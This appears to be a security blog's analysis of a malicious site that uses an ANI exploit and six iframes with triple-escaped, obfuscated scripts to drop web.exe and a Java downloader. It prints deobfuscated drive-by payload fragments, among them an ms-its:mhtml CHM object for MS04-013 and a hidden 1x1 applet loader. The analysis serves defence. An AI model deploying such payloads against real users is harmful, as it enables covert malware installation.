Hide and Seek… A Method for Lasting Longer Online

New methods have surfaced, and the spyware threat has just gotten “smarter”. Some sites have already employed the use of various vulnerabilities in order to deploy a single file, banking on the hope that of these methods, one may prove to exploit an unpatched vulnerability to exploit the system.


Many sites have already employed this method of deploying malicious content into system, and here’s a view of what happens with our sample site.


Either by redirection or from whatever website, the user is is taken to <BLOCKED>/RC, a site which contains an ANI file exploit and 6 iframes that contains diffirent methods of pushing a certain file into a user’s system. Depending on the security employed by the system, and the patches that are put in place, the user’s PC may either execute one, two or all of the contents in the 6 iframes.


IFRAME 1: http://<BLOCKED>/RC/exp_4/index.htm



  • The code is escaped three times before the malicious code is revealed. And even then, it is filled with garbage codes in order to confuse the scanner.
  • Then the file downloaded from <BLOCKED>/RC/web.exe will be dropped and launched in the system.

FINAL CODE:


IFRAME 2:



  • Same as IFRAME 1.

IFRAME 3: http://<BLOCKED>/RC/exp_sp6/index.htm



  • This is also escaped three times, in a non-straightforward manner, before the final code is revealed.
  • Then, a CHM file will be launched. And this CHM file will drop and launch web.exe by exploiting the the MS04-013 vulnerability, which is the same file launched by the earlier IFRAME.

FINAL CODE:


document.write(‘<object data=”ms-its:mhtml:file://c: c.mht!’+PATH+’::/logo.php” type=”text/x-scriptlet” >< /object >’);


IFRAME 4: http://<BLOCKED>/RC/exp_3/index.htm



  • Escaped three times then the final code contains garbage codes to confuse the scanner.
  • Then, the final code will launch web.exe using a vulnerability.

FINAL CODE:


IFRAME 5: http://<BLOCKED>/RC/exp_sp60/index.htm



  • The code is clear for this part.
  • It opens <BLOCKED>/RC/exp_sp60/int.htm which will execute: <BLOCKED>/RC/exp_sp60/final/int.hta
  • the end result is similar to that of the earlear IFRAMEs.

IFRAME 6: http://<BLOCKED>/RC/exp_5/index.htm



  • The code is still escaped three times before the final code is revealed.
  • And the final code will execute both web.exe from <BLOCKED>/RC/web.exe and count.jar (JAVA_BYTEVER.A) from <BLOCKED>/RC/exp_5/count.jar
FINAL CODE:

document.write(“<APPLET ARCHIVE=’count.jar’ CODE=’BlackBox.class’ WIDTH=1 HEIGHT=1>”);
document.write(“<PARAM NAME=’url’ VALUE=’”+PATH+”‘>”);
document.write(““);


Sites that peddle spyware and their cohorts (downloaders and droppers), will employ all possible techniques just to push them to the user’s system. And for aggressive methods such as this, we need to be vigilant in putting the latest patches to secure our systems.


No related posts.